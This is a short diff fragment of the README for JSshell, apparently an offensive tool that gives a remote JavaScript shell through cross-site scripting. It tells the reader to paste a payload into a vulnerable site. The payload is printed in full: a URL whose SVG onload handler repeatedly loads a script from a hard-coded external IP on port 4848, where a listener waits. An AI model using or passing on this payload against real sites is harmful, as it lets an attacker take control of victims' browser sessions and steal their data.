shelld3v/JSshell/README.md

 Listening on [any] 4848 for incoming JS shell ...
 ```

-Now paste this payload to a website that vulnerable to XSS:
+Now paste this payload to the website (or URL) that vulnerable to XSS:

 `https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>`